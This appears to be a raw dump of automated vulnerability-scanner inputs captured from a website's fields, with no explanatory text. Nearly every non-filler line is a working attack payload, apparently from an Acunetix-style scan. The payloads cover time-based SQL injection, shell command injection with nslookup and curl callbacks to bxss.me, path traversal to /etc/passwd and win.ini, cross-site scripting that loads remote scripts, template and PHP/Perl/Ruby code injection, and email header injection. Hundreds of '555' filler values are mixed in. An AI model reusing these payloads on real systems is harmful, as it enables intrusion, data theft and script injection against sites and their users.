;(nslookup -q=cname hitotfssdvwlw3c0a9.bxss.me||curl hitotfssdvwlw3c0a9.bxss.me)|(nslookup -q=cname hitotfssdvwlw3c0a9.bxss.me||curl hitotfssdvwlw3c0a9.bxss.me)&(nslookup -q=cname hitotfssdvwlw3c0a9.bxss.me||curl hitotfssdvwlw3c0a9.bxss.me)
1
W3vWU991') OR 67=(SELECT 67 FROM PG_SLEEP(15))--
Lzg3ERkF')) OR 249=(SELECT 249 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@5PJC9
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+925-925-1=0+0+0+1 --
-1 OR 2+910-910-1=0+0+0+1
-1' OR 2+204-204-1=0+0+0+1 --
-1' OR 2+851-851-1=0+0+0+1 or 'rPpt3H3Z'='
-1" OR 2+104-104-1=0+0+0+1 --
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
5551VMdbBAL'; waitfor delay '0:0:15' --
5550h64p7zn'); waitfor delay '0:0:15' --
555X0UzUuoH')); waitfor delay '0:0:15' --
555-1 OR 503=(SELECT 503 FROM PG_SLEEP(15))--
555-1) OR 17=(SELECT 17 FROM PG_SLEEP(15))--
555-1)) OR 279=(SELECT 279 FROM PG_SLEEP(15))--
555Vs3DkFOM' OR 905=(SELECT 905 FROM PG_SLEEP(15))--
5551kxp8YyO') OR 139=(SELECT 139 FROM PG_SLEEP(15))--
5553uFSKnYr')) OR 213=(SELECT 213 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@SevbF
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1
1
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
response.write(9938645*9788747)
'+response.write(9938645*9788747)+'
"+response.write(9938645*9788747)+"
555
555
555
555
555
555
555
U5qc6ysN
555
555
echo hhnqui$()\ dqahmk\nz^xyu||a #' &echo hhnqui$()\ dqahmk\nz^xyu||a #|" &echo hhnqui$()\ dqahmk\nz^xyu||a #
555
&echo slmzcz$()\ lisnha\nz^xyu||a #' &echo slmzcz$()\ lisnha\nz^xyu||a #|" &echo slmzcz$()\ lisnha\nz^xyu||a #
|echo gfvpgu$()\ xsrcra\nz^xyu||a #' |echo gfvpgu$()\ xsrcra\nz^xyu||a #|" |echo gfvpgu$()\ xsrcra\nz^xyu||a #
(nslookup -q=cname hitozscgmstky13571.bxss.me||curl hitozscgmstky13571.bxss.me))
$(nslookup -q=cname hitksjzlchsude28da.bxss.me||curl hitksjzlchsude28da.bxss.me)
555
&nslookup -q=cname hittydyksbtyh46267.bxss.me&'\"`0&nslookup -q=cname hittydyksbtyh46267.bxss.me&`'
&(nslookup -q=cname hitqfyphsvqvh2a8ee.bxss.me||curl hitqfyphsvqvh2a8ee.bxss.me)&'\"`0&(nslookup -q=cname hitqfyphsvqvh2a8ee.bxss.me||curl hitqfyphsvqvh2a8ee.bxss.me)&`'
|(nslookup -q=cname hitvtzfkkjuhsb159b.bxss.me||curl hitvtzfkkjuhsb159b.bxss.me)
`(nslookup -q=cname hitpymbanasvp9b4bb.bxss.me||curl hitpymbanasvp9b4bb.bxss.me)`
../../../../../../../../../../../../../../etc/passwd
;(nslookup -q=cname hittvvmhwhizcb8db1.bxss.me||curl hittvvmhwhizcb8db1.bxss.me)|(nslookup -q=cname hittvvmhwhizcb8db1.bxss.me||curl hittvvmhwhizcb8db1.bxss.me)&(nslookup -q=cname hittvvmhwhizcb8db1.bxss.me||curl hittvvmhwhizcb8db1.bxss.me)
555
../../../../../../../../../../../../../../windows/win.ini
555
file:///etc/passwd
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
bcc:009247.1565-42061.1565.65675.20012.2@bxss.me
to@example.com>
bcc:009247.1565-42062.1565.65675.20012.2@bxss.me
555
555
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
555
555
${9999989+9999118}
555
555
555
555
555
555
555&n974239=v963838
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
555
http://bxss.me/t/fit.txt?.jpg
/etc/shells
c:/windows/win.ini
bxss.me
555
555
555
555
555
555
555
)
!(()&&!|*|*|
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitfb'.'zesricjv28b8e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(70).chr(109).chr(68).'
".gethostbyname(lc("hitee"."ujhuotuo7ee6a.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(77).chr(105).chr(89)."
555
HttP://bxss.me/t/xss.html?%00
555
bxss.me/t/xss.html?%00
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
';print(md5(31337));$a='
555
555
";print(md5(31337));$a="
555
${@print(md5(31337))}
555
${@print(md5(31337))}\
555
"+"A".concat(70-3).concat(22*4).concat(110).concat(85).concat(121).concat(80)+(require"socket"
Socket.gethostbyname("hitei"+"hhngbjcq5cb07.bxss.me.")[3].to_s)+"
'.print(md5(31337)).'
'+'A'.concat(70-3).concat(22*4).concat(117).concat(87).concat(116).concat(66)+(require'socket'
Socket.gethostbyname('hitas'+'kczysewo01714.bxss.me.')[3].to_s)+'
555
555
555
555
555
555
NewsCommentAdd
555
'"()
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555'&&sleep(27*1000)*vtvbjs&&'
NewsCommentAdd/.
555
555
555"&&sleep(27*1000)*zjrpnu&&"
555
555'||sleep(27*1000)*oayxya||'
555
xfs.bxss.me
555"||sleep(27*1000)*itwoua||"
555
555
'"
555
555
<!--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >aN48(9281)</ScRiPt>
555
'"()&%<zzz><ScRiPt >aN48(9703)</ScRiPt>
555
555
555
555
555
5559371070
555
555
555
555
555
555
555
bfg9995<s1﹥s2ʺs3ʹhjl9995
bfgx4939%C0%BEz1%C0%BCz2a%90bcxhjl4939
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >aN48(9517)</ScRiPt>
555<WV79ML>UBAHK[!+!]</WV79ML>
555<script>aN48(9581)</script>
555<ScR<ScRiPt>IpT>aN48(9429)</sCr<ScRiPt>IpT>
555<ScRiPt
>aN48(9713)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9323></ScRiPt>
555<isindex type=image src=1 onerror=aN48(9199)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9402'>
555<body onload=aN48(9930)>
555<img src=//xss.bxss.me/t/dot.gif onload=aN48(9917)>
555<img src=xyz OnErRor=aN48(9183)>
555<img/src=">" onerror=alert(9997)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%61%4E%34%38%289192%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\aN48(9412)\u003C/sCripT\u003E
555<ScRiPt>aN48(9101)</sCripT>
%F6<img zzz onmouseover=aN48(99411) //%F6>
555<input autofocus onfocus=aN48(9338)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(aN48(9957))}
55579f8M
<ScRiPt >aN48(9737)</ScRiPt>
555<WDJL70>ZPMU9[!+!]</WDJL70>
555<ifRAme sRc=9191.com></IfRamE>
555<avu8SpC x=9019>
555<img sRc='http://attacker-9496/log.php?
555<aromF60<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+646-646-1=0+0+0+1 --
-1 OR 2+436-436-1=0+0+0+1
-1' OR 2+222-222-1=0+0+0+1 --
-1' OR 2+775-775-1=0+0+0+1 or 'sWzNU6om'='
-1" OR 2+419-419-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
MAwbBaPs'; waitfor delay '0:0:15' --
cJsnwItd'); waitfor delay '0:0:15' --
gxehWcoq')); waitfor delay '0:0:15' --
-5 OR 727=(SELECT 727 FROM PG_SLEEP(15))--
-5) OR 217=(SELECT 217 FROM PG_SLEEP(15))--
-1)) OR 380=(SELECT 380 FROM PG_SLEEP(15))--
8SUS1uYH' OR 413=(SELECT 413 FROM PG_SLEEP(15))--
sPzy7OEi') OR 195=(SELECT 195 FROM PG_SLEEP(15))--
n9MSSIXm')) OR 891=(SELECT 891 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@b1VxL
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1PVSD5NNO
555
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1Zor7HoE
555
555
response.write(9781556*9321750)
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
'+response.write(9781556*9321750)+'
555
"+response.write(9781556*9321750)+"
../../../../../../../../../../../../../../etc/passwd
555
555
${9999321+10000276}
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
echo deylvw$()\ qcldnn\nz^xyu||a #' &echo deylvw$()\ qcldnn\nz^xyu||a #|" &echo deylvw$()\ qcldnn\nz^xyu||a #
555
555
../555
&echo dbcpza$()\ mtctaf\nz^xyu||a #' &echo dbcpza$()\ mtctaf\nz^xyu||a #|" &echo dbcpza$()\ mtctaf\nz^xyu||a #
555&n926972=v983416
555
|echo rwwhof$()\ gpyncu\nz^xyu||a #' |echo rwwhof$()\ gpyncu\nz^xyu||a #|" |echo rwwhof$()\ gpyncu\nz^xyu||a #
555
555
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
(nslookup hitoimxwswjkj911b4.bxss.me||perl -e "gethostbyname('hitoimxwswjkj911b4.bxss.me')")
555
555
$(nslookup hitaxazwjllzf7c455.bxss.me||perl -e "gethostbyname('hitaxazwjllzf7c455.bxss.me')")
&(nslookup hitshestmsxrk06dab.bxss.me||perl -e "gethostbyname('hitshestmsxrk06dab.bxss.me')")&'\"`0&(nslookup hitshestmsxrk06dab.bxss.me||perl -e "gethostbyname('hitshestmsxrk06dab.bxss.me')")&`'
555
)
555
Http://bxss.me/t/fit.txt
|(nslookup hitnlhxvxqcqx0f0a4.bxss.me||perl -e "gethostbyname('hitnlhxvxqcqx0f0a4.bxss.me')")
!(()&&!|*|*|
555
http://bxss.me/t/fit.txt?.jpg
^(#$!@#$)(()))******
555
bxss.me
`(nslookup hitfegnhtpvfq8ed26.bxss.me||perl -e "gethostbyname('hitfegnhtpvfq8ed26.bxss.me')")`
555
555
555
555
555
'"()
555
;(nslookup hitupnnpxwevib72b8.bxss.me||perl -e "gethostbyname('hitupnnpxwevib72b8.bxss.me')")|(nslookup hitupnnpxwevib72b8.bxss.me||perl -e "gethostbyname('hitupnnpxwevib72b8.bxss.me')")&(nslookup hitupnnpxwevib72b8.bxss.me||perl -e "gethostbyname('hitupnnpxwevib72b8.bxss.me')")
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitpn'.'yqxkkprfabd95.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(87).chr(103).chr(73).'
555
".gethostbyname(lc("hitln"."bxpgojped16b4.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(88).chr(103).chr(82)."
555
555
555
555
555
555
555
555
-1 OR 2+358-358-1=0+0+0+1 --
555
555
555
-1 OR 2+915-915-1=0+0+0+1
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
-1' OR 2+420-420-1=0+0+0+1 --
555
';print(md5(31337));$a='
-1' OR 2+351-351-1=0+0+0+1 or 'GGnE8JGu'='
555
-1" OR 2+976-976-1=0+0+0+1 --
";print(md5(31337));$a="
if(now()=sysdate(),sleep(15),0)
"+"A".concat(70-3).concat(22*4).concat(121).concat(81).concat(117).concat(68)+(require"socket"
Socket.gethostbyname("hitxv"+"kalmauhoe4a59.bxss.me.")[3].to_s)+"
HttP://bxss.me/t/xss.html?%00
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
${@print(md5(31337))}
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
bxss.me/t/xss.html?%00
${@print(md5(31337))}\
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
NewsCommentAdd
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
'+'A'.concat(70-3).concat(22*4).concat(110).concat(71).concat(101).concat(85)+(require'socket'
Socket.gethostbyname('hitdl'+'smfsshzqd2250.bxss.me.')[3].to_s)+'
555
'.print(md5(31337)).'
555
-1; waitfor delay '0:0:15' --
555
555
555
555
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
555
555
NewsCommentAdd/.
1 waitfor delay '0:0:15' --
555
whUTcsj2'; waitfor delay '0:0:15' --
555
555
555
2LGqvsm9'); waitfor delay '0:0:15' --
555
555
555
7rnLCMLi')); waitfor delay '0:0:15' --
555
555
555
-5 OR 106=(SELECT 106 FROM PG_SLEEP(15))--
555
-5) OR 533=(SELECT 533 FROM PG_SLEEP(15))--
/xfs.bxss.me
555
-1)) OR 553=(SELECT 553 FROM PG_SLEEP(15))--
'"
ZWFV7Ek5' OR 834=(SELECT 834 FROM PG_SLEEP(15))--
555
555
<!--
555
555
555
555
555
555
az9vwxyi') OR 34=(SELECT 34 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
hUB8eV4f')) OR 209=(SELECT 209 FROM PG_SLEEP(15))--
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1'"
555
555
@@5ogPx
555'"()&%<acx><ScRiPt >aB0V(9802)</ScRiPt>
555
555
555
555
555
555
555
555
555
555
555
555
'"()&%<acx><ScRiPt >aB0V(9922)</ScRiPt>
555
555
555
5559511806
555
555
555
555
555
555
555
555
555
555
acu3515<s1﹥s2ʺs3ʹuca3515
acux1604%C0%BEz1%C0%BCz2a%90bcxuca1604
555
<%={{={@{#{${acx}}%>
<th:t="${acx}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
555
555
555
555
acx{{98991*97996}}xca
555
555
555
555
acx[[${98991*97996}]]xca
555
555
acx__${98991*97996}__::.x
555
555
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555
555
555<ScRiPt >aB0V(9534)</ScRiPt>
555
555
555<WD4OID>YSD7W[!+!]</WD4OID>
555
555
555
555<script>aB0V(9403)</script>
555<ScR<ScRiPt>IpT>aB0V(9260)</sCr<ScRiPt>IpT>
555<ScRiPt
>aB0V(9768)</ScRiPt>
555
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9547></ScRiPt>
555
555
555<isindex type=image src=1 onerror=aB0V(9861)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9985'>
555<body onload=aB0V(9648)>
555<img src=//xss.bxss.me/t/dot.gif onload=aB0V(9598)>
555<img src=xyz OnErRor=aB0V(9700)>
555<img/src=">" onerror=alert(9952)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%61%42%30%56%289325%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\aB0V(9849)\u003C/sCripT\u003E
555<ScRiPt>aB0V(9250)</sCripT>
%F6<img acu onmouseover=aB0V(94111) //%F6>
555<input autofocus onfocus=aB0V(9319)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{acu:Expre/**/SSion(aB0V(9124))}
555<% contenteditable onresize=aB0V(9258)>
5552ClZh
<ScRiPt >aB0V(9556)</ScRiPt>
555<WDRKVC>EMZMF[!+!]</WDRKVC>
555<ifRAme sRc=9372.com></IfRamE>
555<156PiL x=9944>
555<img sRc='http://attacker-9493/log.php?
555<m2drJY<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<acx><ScRiPt >Zyl4(9936)</ScRiPt>
'"()&%<acx><ScRiPt >Zyl4(9175)</ScRiPt>
5559296666
acu9455<s1﹥s2ʺs3ʹuca9455
acux7889%C0%BEz1%C0%BCz2a%90bcxuca7889
<%={{={@{#{${acx}}%>
<th:t="${acx}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >Zyl4(9405)</ScRiPt>
555<WDJT48>VY703[!+!]</WDJT48>
555<script>Zyl4(9304)</script>
555<ScR<ScRiPt>IpT>Zyl4(9595)</sCr<ScRiPt>IpT>
555<ScRiPt
>Zyl4(9606)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9471></ScRiPt>
555<isindex type=image src=1 onerror=Zyl4(9098)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9356'>
555<body onload=Zyl4(9163)>
555<img src=//xss.bxss.me/t/dot.gif onload=Zyl4(9850)>
555<img src=xyz OnErRor=Zyl4(9413)>
555<img/src=">" onerror=alert(9535)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%5A%79%6C%34%289091%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\Zyl4(9329)\u003C/sCripT\u003E
555<ScRiPt>Zyl4(9758)</sCripT>
%F6<img acu onmouseover=Zyl4(99461) //%F6>
555<input autofocus onfocus=Zyl4(9292)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{acu:Expre/**/SSion(Zyl4(9798))}
555<% contenteditable onresize=Zyl4(9666)>
555gvPXK
<ScRiPt >Zyl4(9860)</ScRiPt>
555
555<WVXN9L>NDQKN[!+!]</WVXN9L>
555
555<ifRAme sRc=9766.com></IfRamE>
555
555<uoPB8E x=9933>
555<img sRc='http://attacker-9792/log.php?
555
555<cQifBj<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+745-745-1=0+0+0+1 --
-1 OR 2+167-167-1=0+0+0+1
-1' OR 2+335-335-1=0+0+0+1 --
-1' OR 2+373-373-1=0+0+0+1 or 'OE3rTeZ3'='
-1" OR 2+141-141-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
q2b8aLRM'; waitfor delay '0:0:15' --
3VoQX7EP'); waitfor delay '0:0:15' --
XGGimNcp')); waitfor delay '0:0:15' --
-5 OR 128=(SELECT 128 FROM PG_SLEEP(15))--
-5) OR 630=(SELECT 630 FROM PG_SLEEP(15))--
-1)) OR 412=(SELECT 412 FROM PG_SLEEP(15))--
9WuU8ZJU' OR 103=(SELECT 103 FROM PG_SLEEP(15))--
OFtDMRkJ') OR 37=(SELECT 37 FROM PG_SLEEP(15))--
PTFJ8Uj8')) OR 671=(SELECT 671 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@HycmU
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+136-136-1=0+0+0+1 --
-1 OR 2+704-704-1=0+0+0+1
-1' OR 2+627-627-1=0+0+0+1 --
-1' OR 2+155-155-1=0+0+0+1 or 'FWiuLe7J'='
-1" OR 2+146-146-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
za6Ogztm'; waitfor delay '0:0:15' --
bUBGI4DG'); waitfor delay '0:0:15' --
urvEUKF6')); waitfor delay '0:0:15' --
-5 OR 660=(SELECT 660 FROM PG_SLEEP(15))--
-5) OR 461=(SELECT 461 FROM PG_SLEEP(15))--
-1)) OR 960=(SELECT 960 FROM PG_SLEEP(15))--
ZvzUxriG' OR 294=(SELECT 294 FROM PG_SLEEP(15))--
3gTBJEcj') OR 759=(SELECT 759 FROM PG_SLEEP(15))--
ym5c1k1I')) OR 769=(SELECT 769 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@Yknuw
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitmo'.'hxluozjea2f8f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(80).chr(119).chr(84).'
".gethostbyname(lc("hitcn"."haxytlvo6831d.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(67).chr(111).chr(66)."
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
';print(md5(31337));$a='
555
";print(md5(31337));$a="
555
${@print(md5(31337))}
555
${@print(md5(31337))}\
'.print(md5(31337)).'
555
"+"A".concat(70-3).concat(22*4).concat(98).concat(74).concat(118).concat(90)+(require"socket"
Socket.gethostbyname("hitui"+"yelffpqs4df75.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(102).concat(82).concat(114).concat(69)+(require'socket'
Socket.gethostbyname('hitlm'+'zdnxsprj107b7.bxss.me.')[3].to_s)+'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
NewsCommentAdd
555
555
NewsCommentAdd/.
555
555
555
555
555
555
-1 OR 2+787-787-1=0+0+0+1 --
-1 OR 2+59-59-1=0+0+0+1
-1' OR 2+848-848-1=0+0+0+1 --
-1' OR 2+259-259-1=0+0+0+1 or 'PWx3YH4v'='
-1" OR 2+769-769-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
K0AkiKw4'; waitfor delay '0:0:15' --
Ocjeggfc'); waitfor delay '0:0:15' --
yx7OX1GU')); waitfor delay '0:0:15' --
-5 OR 580=(SELECT 580 FROM PG_SLEEP(15))--
-5) OR 595=(SELECT 595 FROM PG_SLEEP(15))--
-1)) OR 80=(SELECT 80 FROM PG_SLEEP(15))--
CP7F3tpW' OR 459=(SELECT 459 FROM PG_SLEEP(15))--
rKUktU9b') OR 309=(SELECT 309 FROM PG_SLEEP(15))--
8K6qNvD7')) OR 870=(SELECT 870 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@EUlGQ
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1F3GE3XVI3Z0
555
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
5EAkfWNH
q2BIJjt9: IWjm3eVz
555
response.write(9466460*9113925)
555<esi:include src="http://bxss.me/rpb.png"/>
555
'+response.write(9466460*9113925)+'
555
555
555
${9999570+9999306}
"+response.write(9466460*9113925)+"
555
<% response.write(9466460*9113925) %>
555
../../../../../../../../../../../../../../etc/passwd
+response.write(9466460*9113925)'
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
file:///etc/passwd
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
)
../555
555
555&n948859=v964117
!(()&&!|*|*|
555
echo mwokaq$()\ ufpygj\nz^xyu||a #' &echo mwokaq$()\ ufpygj\nz^xyu||a #|" &echo mwokaq$()\ ufpygj\nz^xyu||a #
555
Http://bxss.me/t/fit.txt
555
&echo fiegjz$()\ lqchqv\nz^xyu||a #' &echo fiegjz$()\ lqchqv\nz^xyu||a #|" &echo fiegjz$()\ lqchqv\nz^xyu||a #
http://bxss.me/t/fit.txt?.jpg
^(#$!@#$)(()))******
555
555&echo fzjnpz$()\ pxjfkb\nz^xyu||a #' &echo fzjnpz$()\ pxjfkb\nz^xyu||a #|" &echo fzjnpz$()\ pxjfkb\nz^xyu||a #
/etc/shells
555
555
|echo cbwjqe$()\ dvymfp\nz^xyu||a #' |echo cbwjqe$()\ dvymfp\nz^xyu||a #|" |echo cbwjqe$()\ dvymfp\nz^xyu||a #
555
555
555|echo dttxkt$()\ bplixb\nz^xyu||a #' |echo dttxkt$()\ bplixb\nz^xyu||a #|" |echo dttxkt$()\ bplixb\nz^xyu||a #
../../../../../../../../../../../../../../etc/shells
555
555
555
expr 9000803641 - 931575
c:/windows/win.ini
redirtest.acx
555
bxss.me
555
(nslookup -q=cname hitlyybhfkcis3102a.bxss.me||curl hitlyybhfkcis3102a.bxss.me))
555
$(nslookup -q=cname hitljsytmlulp832d3.bxss.me||curl hitljsytmlulp832d3.bxss.me)
555
555
&nslookup -q=cname hituwnfftcrzr06f91.bxss.me&'\"`0&nslookup -q=cname hituwnfftcrzr06f91.bxss.me&`'
555
555
555
555
&(nslookup -q=cname hitdqifrbwztn31d22.bxss.me||curl hitdqifrbwztn31d22.bxss.me)&'\"`0&(nslookup -q=cname hitdqifrbwztn31d22.bxss.me||curl hitdqifrbwztn31d22.bxss.me)&`'
555
555
555
|(nslookup -q=cname hitfelnyaorbs54654.bxss.me||curl hitfelnyaorbs54654.bxss.me)
555
555
555
555
`(nslookup -q=cname hitxydtauxrkv9cfa7.bxss.me||curl hitxydtauxrkv9cfa7.bxss.me)`
555
555
555
'.gethostbyname(lc('hitvh'.'mkpiytit47f99.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(87).chr(122).chr(90).'
;(nslookup -q=cname hitblfhitjvex4233e.bxss.me||curl hitblfhitjvex4233e.bxss.me)|(nslookup -q=cname hitblfhitjvex4233e.bxss.me||curl hitblfhitjvex4233e.bxss.me)&(nslookup -q=cname hitblfhitjvex4233e.bxss.me||curl hitblfhitjvex4233e.bxss.me)
555
555
